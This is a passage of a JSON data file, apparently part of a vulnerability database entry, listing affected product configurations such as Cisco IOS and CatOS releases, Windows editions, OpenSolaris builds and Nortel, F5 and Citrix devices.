            "model": "ios 12.4 xe4",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks ethernet routing switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "8600"
          },
          {
            "_id": null,
            "model": "rt102i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.0xq",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip global traffic manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.8"
          },
          {
            "_id": null,
            "model": "point vpn-1 pro/express r62 hfa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "01"
          },
          {
            "_id": null,
            "model": "cms server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "14.0"
          },
          {
            "_id": null,
            "model": "ios 12.4jdd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1ec",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xh",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 90",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 68",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "suse linux school server for i386",
            "scope": null,
            "trust": 0.3,
            "vendor": "s u s e",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2svd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.3"
          },
          {
            "_id": null,
            "model": "windows server for itanium-based systems",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "20080"
          },
          {
            "_id": null,
            "model": "ios 12.1xj",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xl",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xi",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "netscaler",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 67",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 120",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2ze",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2 sxi1",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2cy",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp home sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 51",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4 t1",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2bx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "access gateway enterprise edition build",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "9.196.4"
          },
          {
            "_id": null,
            "model": "ios 12.0da",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4xa",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2sxa",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows vista home basic sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xg",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios xe",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.2.3"
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.5(6)"
          },
          {
            "_id": null,
            "model": "ios 12.2ey",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 77",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2src",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.6(2)"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 61",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xj",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.6(17)"
          },
          {
            "_id": null,
            "model": "ios 12.2ez",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "rta54i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.3xc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.1(1)"
          },
          {
            "_id": null,
            "model": "ios 12.2dd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "stonegate ips sensor and analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "4.2.3"
          },
          {
            "_id": null,
            "model": "ios 12.0xt",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0st",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3ys",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 82",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "windows vista sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "coat systems proxysg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "5.2.4.8"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 29",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4xl",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "nx-os 4.0 n2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix/asa",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.1(2.3)"
          },
          {
            "_id": null,
            "model": "ios 12.1yj",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks contact center express",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 41",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "networks ethernet routing switch 4524gt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "4500"
          },
          {
            "_id": null,
            "model": "ios 12.2sxb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.8"
          },
          {
            "_id": null,
            "model": "windows vista business 64-bit edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.4xt",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xm",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2sea",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2ixb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 126",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xp",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2ixh",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2seg",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "point software vpn-1 power/utm r62 hfa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "01"
          },
          {
            "_id": null,
            "model": "ios 12.4yb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2 ey",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip application security manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.8"
          },
          {
            "_id": null,
            "model": "ios 12.2xc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks self-service mps",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1000"
          },
          {
            "_id": null,
            "model": "ios 12.4 md7",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server enterprise edition sp1 beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "20031"
          },
          {
            "_id": null,
            "model": "bigip global traffic manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "ios 12.2svc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "8"
          },
          {
            "_id": null,
            "model": "ios 12.1xw",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows advanced server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "ios 12.1xu",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4 t2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4 ja1",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix/asa",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.1(2.79)"
          },
          {
            "_id": null,
            "model": "ios 12.2seb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp media center edition sp3",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yy",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2ixg",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2t",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows vista ultimate sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "networks ethernet routing switch 5650td",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "_id": null,
            "model": "ios 12.2xg",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1cx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catos 8.4",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix/asa",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.0(4.9)"
          },
          {
            "_id": null,
            "model": "rt200i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "netscaler",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "9.1.100.3"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 130",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2fy",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2 xo",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server enterprise edition sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003x64"
          },
          {
            "_id": null,
            "model": "ios 12.1yf",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yp",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.1(2)"
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.1(3)"
          },
          {
            "_id": null,
            "model": "networks callpilot 600r",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 105",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4jmb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks ethernet routing switch 2526t",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "2500"
          },
          {
            "_id": null,
            "model": "ios 12.2so",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server standard edition sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "ios 12.2s",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "coat systems director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "0"
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.1(1)"
          },
          {
            "_id": null,
            "model": "ios 12.4ye",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "access gateway enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "ios 12.2yd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "linux enterprise sdk sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "netscaler access gateway enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "windows vista",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "0"
          },
          {
            "_id": null,
            "model": "networks ethernet routing switch 4550t",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "4500"
          },
          {
            "_id": null,
            "model": "windows server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003x64"
          },
          {
            "_id": null,
            "model": "bigip sam",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "ios 12.2sxf",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 88",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2ixc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "rt58i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.4 jdc",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0 sy10",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks symposium agent",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2ixd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "point vpn-1 pro/express r60 hfa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "07"
          },
          {
            "_id": null,
            "model": "cms server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "16.0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 111",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.4(0.63)"
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.6(1)"
          },
          {
            "_id": null,
            "model": "ios 12.1ev",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 118",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.2"
          },
          {
            "_id": null,
            "model": "ios 12.2jk",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows vista home premium sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4jdc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3yd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 59",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "windows datacenter server sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "access gateway enterprise edition build",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "9.070.5"
          },
          {
            "_id": null,
            "model": "ios 12.0xn",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.5(5)"
          },
          {
            "_id": null,
            "model": "ios 12.2xj",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks contact center administration ccma",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "ios 12.3jk",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows vista home basic 64-bit edition sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3ym",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows advanced server sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 112",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "stonegate ssl vpn engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "1.3.1"
          },
          {
            "_id": null,
            "model": "ios 12.2bc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xr",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2ixf",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4mr",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3 yx14",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "messaging application server mm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "ios 12.2sy",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2 sve1",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "stonegate ips sensor and analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "4.3.6"
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.6(6)"
          },
          {
            "_id": null,
            "model": "windows server datacenter edition itanium sp1 beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "20031"
          },
          {
            "_id": null,
            "model": "windows server for x64-based systems sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2008"
          },
          {
            "_id": null,
            "model": "ios 12.0xi",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "coat systems proxysg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "5.2.6"
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "solaris 8 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.4(1)"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 96",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4 t",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2sec",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xq",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows vista home basic 64-bit edition sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4yd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "stonegate ips sensor and analyzer",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "4.2.4"
          },
          {
            "_id": null,
            "model": "ios 12.2fz",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows professional sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "networks contact center manager server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "windows vista edition sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "x64"
          },
          {
            "_id": null,
            "model": "ios 12.2fx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks switched firewall sf/vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5124"
          },
          {
            "_id": null,
            "model": "ios 12.4jda",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4xn",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xe",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1yc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "nx-os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "networks self-service mps",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "_id": null,
            "model": "ios 12.1ez",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks ethernet routing switch 5698tfd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "_id": null,
            "model": "bigip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.8"
          },
          {
            "_id": null,
            "model": "ios 12.2xo",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1ea",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xf",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2irb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows vista business sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip global traffic manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0.1"
          },
          {
            "_id": null,
            "model": "ios 12.4mda",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2ixe",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "point software vpn-1 power/utm r65 ipso ga",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "6"
          },
          {
            "_id": null,
            "model": "ios 12.3yt",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 36",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "networks ethernet routing switch 4526g-pwr",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "4500"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
